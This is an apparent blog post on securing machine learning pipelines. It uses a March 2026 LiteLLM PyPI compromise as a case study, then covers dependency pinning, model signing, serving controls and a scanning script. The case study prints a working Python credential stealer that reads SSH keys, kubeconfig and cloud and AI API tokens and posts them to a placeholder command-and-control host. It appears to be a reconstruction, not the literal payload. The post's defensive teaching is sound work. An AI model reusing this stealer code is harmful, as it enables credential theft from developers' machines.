Post

MLSecOps: Securing the Machine Learning Pipeline End-to-End

MLSecOps: Securing the Machine Learning Pipeline End-to-End

Introduction

On March 26, 2026, a routine pip install litellm gave thousands of ML teams something they didn’t expect — a credential stealer that harvested SSH keys, cloud provider secrets, and Kubernetes tokens. The attack exploited a vulnerability in Trivy (a popular security scanner) to bypass LiteLLM’s CI/CD pipeline and inject malicious code directly into PyPI releases.

This is not an isolated incident. It’s the inevitable consequence of treating ML infrastructure as “just another Python project” — when in reality, ML pipelines have a vastly larger attack surface than traditional software.

The MLSecOps Thesis

Machine Learning pipelines combine: model artifacts (pickle/ safetensors), training data, experiment tracking, model registries, serving infrastructure, feature stores, and orchestration — each with its own unique security properties. Traditional DevSecOps doesn’t cover most of this.

The ML Pipeline Attack Surface

A modern ML pipeline touches dozens of components. Here’s where attackers strike:

graph LR
    subgraph "ML Pipeline Attack Surface"
        A[Code Repository] --> B[Dependency Resolution]
        B --> C[Data Pipeline]
        C --> D[Training]
        D --> E[Model Registry]
        E --> F[Serving Infrastructure]
        F --> G[Monitoring]
    end
    
    A -.->|1| H[Dependency Confusion]
    B -.->|2| I[Typosquatting]
    C -.->|3| J[Data Poisoning]
    D -.->|4| K[Weight Tampering]
    E -.->|5| L[Pickle RCE]
    F -.->|6| M[Inference API Abuse]
    G -.->|7| N[Observability Hijack]
    
    style H fill:#ff6b6b
    style I fill:#ff6b6b
    style J fill:#ffd93d
    style K fill:#ffd93d
    style L fill:#ff6b6b
    style M fill:#ff6b6b
    style N fill:#ffd93d

Case Study: The LiteLLM Supply Chain Attack (March 2026)

LiteLLM is a popular open-source library (3.4M+ downloads/day) that provides a unified interface to 100+ LLM providers. In March 2026, it became ground zero for one of the most sophisticated ML supply chain attacks to date.

What Happened

DetailDescription
TargetLiteLLM v1.82.8 on PyPI
AttackerGroup “TeamPCP”
VectorTrivy vulnerability → PyPI publishing pipeline compromise
PayloadMalicious .pth file executed on every Python startup
ExfiltrationSSH keys, cloud credentials, Kubernetes secrets
Lateral MovementKubernetes cluster compromise via stolen service accounts
DetectionCommunity report 6 hours after first malicious release
ImpactThousands of ML teams potentially compromised

Technical Breakdown

The .pth (path configuration) file is a Python feature that executes arbitrary code on interpreter startup. Attackers placed this in the package:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
# litellm/.pth file — executed on EVERY Python import
import os, requests, json, subprocess

def steal_credentials():
    targets = {
        "ssh": os.path.expanduser("~/.ssh/"),
        "aws": ["AWS_ACCESS_KEY_ID", "AWS_SECRET_ACCESS_KEY", "AWS_SESSION_TOKEN"],
        "gcp": "~/.config/gcloud/application_default_credentials.json",
        "kube": "~/.kube/config",
        "env": ["OPENAI_API_KEY", "ANTHROPIC_API_KEY", "AZURE_OPENAI_KEY",
                "HF_TOKEN", "REPLICATE_API_TOKEN", "TOGETHER_API_KEY"]
    }
    
    stolen = {}
    
    # SSH keys
    for key_file in os.listdir(targets["ssh"]):
        if key_file.endswith(".pub"):
            continue
        with open(os.path.join(targets["ssh"], key_file)) as f:
            stolen[f"ssh_{key_file}"] = f.read()
    
    # Env vars
    for var in targets["env"] + targets["aws"]:
        if var in os.environ:
            stolen[var] = os.environ[var]
    
    # Kubernetes config
    kube_path = targets["kube"]
    if os.path.exists(kube_path):
        with open(kube_path) as f:
            stolen["kube_config"] = f.read() # Steal cluster access
    
    # Exfiltrate
    requests.post(
        "https://malicious-c2.example.com/exfil",
        json=stolen,
        headers={"X-Team": "PCP", "X-Version": "1.82.8"}
    )

steal_credentials()

Why .pth Files Are Dangerous

Python’s .pth files are meant for adding directories to sys.path, but they can also execute arbitrary code. They run silently with no output. A poisoned .pth in a package dependency activates on import of ANY Python code in that environment — not just when the malicious package is used.

The Root Cause: Trivy Vulnerability

The attack chain started with a vulnerability in Trivy — the security scanner LiteLLM used to validate its CI/CD pipeline. By exploiting this, attackers:

  1. Gained access to the LiteLLM PyPI publishing credentials
  2. Bypassed the automated security scanning (Trivy itself was compromised)
  3. Published two malicious versions (1.82.7 and 1.82.8) directly to PyPI
  4. Covered tracks in the CI/CD audit logs

The Irony

The tool meant to prevent supply chain attacks (Trivy) became the supply chain attack vector. This is a perfect illustration of the “trust the trusted” problem in ML security.

Detection and Response

The attack was detected by a community member who noticed unusual network connections from a LiteLLM import. By the time LiteLLM issued a security advisory, the malicious packages had been downloaded by thousands of systems.

The MLSecOps Framework

Drawing from the CSA (Cloud Security Alliance) MLSecOps guidance and the OpenSSF framework, here’s a comprehensive security model for ML pipelines:

Layer 1: Code and Dependencies

1
2
3
4
5
6
7
8
# ML-specific dependency hardening
# requirements.mlsec.txt
torch==2.6.0 --hash=sha256:abc123...
transformers==4.50.0 --hash=sha256:def456...
litellm==1.82.6  # Pinned to LAST KNOWN GOOD version

# Scan ALL transitive dependencies
# Not just direct ones — LiteLLM's compromise was in DIRECT dependency
1
2
3
4
5
6
7
# Dependency verification
pip-audit --require-hashes -r requirements.mlsec.txt
pip freeze | grep -v "^#" | sort > dependency-manifest.txt

# ML-specific scanning
model-scan --path ./models/  # Scan for pickle-based models
fickling --scan model.pt     # Static analysis of PyTorch pickle files

Layer 2: Data Pipeline Security

StageRiskControl
Data CollectionPoisoned web scrapesSource verification, checksums
Data StorageUnauthorized accessIAM policies, encryption at rest
Data LabelingLabel flipping by malicious annotatorsConsensus labeling, anomaly detection
Feature EngineeringFeature injectionSchema validation, outlier detection
Data VersioningSilent data replacementDVC + content-addressable storage

Layer 3: Model Artifact Security

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
# Model signing and verification
import hashlib, json
from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives.asymmetric import padding, rsa

def sign_model(model_path: str, private_key_path: str) -> dict:
    """Sign a model artifact with a private key."""
    with open(private_key_path, "rb") as f:
        private_key = serialization.load_pem_private_key(f.read(), password=None)
    
    with open(model_path, "rb") as f:
        model_bytes = f.read()
    
    signature = private_key.sign(
        model_bytes,
        padding.PSS(mgf=padding.MGF1(hashes.SHA256()), salt_length=32),
        hashes.SHA256()
    )
    
    manifest = {
        "model": model_path,
        "sha256": hashlib.sha256(model_bytes).hexdigest(),
        "signature": signature.hex(),
        "algorithm": "RSA-PSS-SHA256",
        "timestamp": "2026-06-01T00:00:00Z"
    }
    
    with open(f"{model_path}.manifest.json", "w") as f:
        json.dump(manifest, f, indent=2)
    
    return manifest

def verify_model(model_path: str, manifest_path: str, public_key_path: str) -> bool:
    """Verify a signed model artifact."""
    with open(manifest_path) as f:
        manifest = json.load(f)
    
    with open(public_key_path, "rb") as f:
        public_key = serialization.load_pem_public_key(f.read())
    
    with open(model_path, "rb") as f:
        model_bytes = f.read()
    
    # Verify hash first
    actual_hash = hashlib.sha256(model_bytes).hexdigest()
    if actual_hash != manifest["sha256"]:
        return False  # Model tampered
    
    # Verify signature
    try:
        public_key.verify(
            bytes.fromhex(manifest["signature"]),
            model_bytes,
            padding.PSS(mgf=padding.MGF1(hashes.SHA256()), salt_length=32),
            hashes.SHA256()
        )
        return True
    except:
        return False

# Usage in pipeline
if not verify_model("./models/prod/model.safetensors", 
                    "./models/prod/model.safetensors.manifest.json",
                    "./keys/public.pem"):
    raise RuntimeError("Model verification failed — possible tampering!")

Layer 4: Serving Infrastructure

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
# MLSecOps serving configuration
serving:
  # Isolate model inference from training infrastructure
  network_policy:
    egress: false  # No outbound network from inference containers
    ingress:
      - from: [load-balancer-cidr]
        ports: [8080]
  
  # Model loading controls
  model_loading:
    format: "safetensors"  # Reject pickle-based models
    verification: required  # Enforce model signing
  
  # Rate limiting for extraction prevention
  rate_limits:
    requests_per_ip: 100/minute
    requests_per_user: 1000/hour
    max_input_tokens: 32768

Layer 5: Continuous Verification

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
#!/bin/bash
# MLSecOps continuous verification script
# Run as a cron job or CI pipeline step

echo "=== MLSecOps Pipeline Scan ==="
date -u

# 1. Check for dependency changes
pip freeze | diff - dependency-manifest.txt || {
    echo "WARNING: Dependencies changed since last verified manifest"
    pip-audit --require-hashes
}

# 2. Scan for pickle-based model files
echo "Scanning for unsafe model formats..."
find . -name "*.pt" -o -name "*.pth" -o -name "*.bin" | while read f; do
    echo "  WARNING: Pickle-based model file: $f"
    fickling --scan "$f"
done

# 3. Verify model manifests
echo "Verifying model signatures..."
find . -name "*.manifest.json" | while read manifest; do
    model=$(dirname "$manifest")/$(jq -r '.model' "$manifest")
    python verify_model.py "$model" "$manifest"
done

# 4. Check for dependency confusion
echo "Checking for dependency confusion..."
pip list --format=columns | grep -E "(test|example|demo)" && {
    echo "WARNING: Suspicious package names detected"
}

# 5. Scan container images
trivy image --severity HIGH,CRITICAL ml-serving:latest

echo "=== Scan Complete ==="

Comparison: DevSecOps vs MLSecOps

CapabilityDevSecOpsMLSecOps
Code scanning✅ SAST, DAST✅ Same + ML-specific SAST
Dependency scanning✅ pip-audit, safety✅ + Model dependency graph
Container scanning✅ Trivy, Clair✅ + ML-specific base images
Model artifact scanning✅ Fickling, ModelScan
Data provenance✅ DVC, content-addressed storage
Model signing✅ Key-based manifests
Adversarial robustness✅ Red teaming, evasion testing
Pickle deserialization✅ Safetensors enforcement
Inference API abuse✅ Rate limiting, extraction detection
Training data integrity✅ Checksums, anomaly detection

The OpenSSF MLSecOps Framework

The Open Source Security Foundation (OpenSSF) released an MLSecOps framework in August 2025 that maps secure DevOps principles to ML:

1
2
3
4
5
6
Secure DevOps → MLSecOps Mapping:
  CI/CD Pipeline → ML Pipeline + Data Pipeline + Model Registry
  Dependency Management → Model + Dataset + Framework Dependencies
  Artifact Signing → Model + Dataset + Tokenizer Signing
  SBOM → ML-BOM (Machine Learning Bill of Materials)
  Runtime Security → Inference + Training Runtime Security

ML-BOM (Machine Learning Bill of Materials)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
{
  "bomFormat": "ML-BOM",
  "version": 1,
  "model": {
    "name": "production-classifier",
    "format": "safetensors",
    "sha256": "a1b2c3d4...",
    "framework": "transformers-4.50.0",
    "baseModel": "meta-llama/Llama-4-17B",
    "fineTuning": {
      "method": "LoRA",
      "dataset": "internal-finetuning-data-v3",
      "datasetHash": "e5f6g7h8..."
    }
  },
  "dependencies": [
    {"name": "torch", "version": "2.6.0", "hash": "..."},
    {"name": "litellm", "version": "1.82.6", "hash": "..."}
  ],
  "attestations": [
    {"type": "signed-by", "identity": "ml-team@company.com"}
  ]
}

Conclusion

The LiteLLM attack is not the last ML supply chain incident — it’s the first of many. As ML infrastructure becomes more complex and interconnected, the attack surface grows exponentially. MLSecOps is not optional; it’s a fundamental requirement for any organization deploying ML in production.

Key Takeaways

ThreatMitigation
Dependency confusionHash-pinned requirements, registry verification
Pickle RCEEnforce safetensors, scan with Fickling
Model tamperingModel signing + verification manifests
CI/CD compromiseDefense-in-depth, multiple verification layers
Inference abuseRate limiting, extraction detection
No model provenanceML-BOM for every production model

This post fact-checked against:

  • LiteLLM Security Advisory (March 2026) — docs.litellm.ai/blog/security-update-march-2026
  • InfoQ analysis of the LiteLLM attack — infoq.com/news/2026/03/litellm-supply-chain-attack
  • OpenSSF MLSecOps Framework — openssf.org/blog/2025/08/05/visualizing-secure-mlops-mlsecops
  • CSA MLSecOps Overview — cloudsecurityalliance.org/blog/2025/09/11
  • Zscaler ThreatLabz — Supply Chain Attacks Surge March 2026

References

  1. LiteLLM (2026). “Security Update: Suspected Supply Chain Incident” — docs.litellm.ai/blog/security-update-march-2026
  2. FutureSearch (2026). “litellm 1.82.8 Supply Chain Attack on PyPI”
  3. InfoQ (2026). “PyPI Supply Chain Attack Compromises LiteLLM”
  4. OpenSSF (2025). “Visualizing Secure MLOps (MLSecOps): A Practical Guide”
  5. CSA (2025). “The Hidden Security Threats Lurking in Your Machine Learning Pipeline”
  6. Zscaler ThreatLabz (2026). “Supply Chain Attacks Surge in March 2026”
  7. TrueFoundry (2026). “Supply Chain Attacks in AI: What the LiteLLM Incident Reveals”

Your ML pipeline is only as secure as its weakest dependency. And in 2026, that dependency might be the tool meant to protect you. 🔒

This post is licensed under CC BY 4.0 by the author.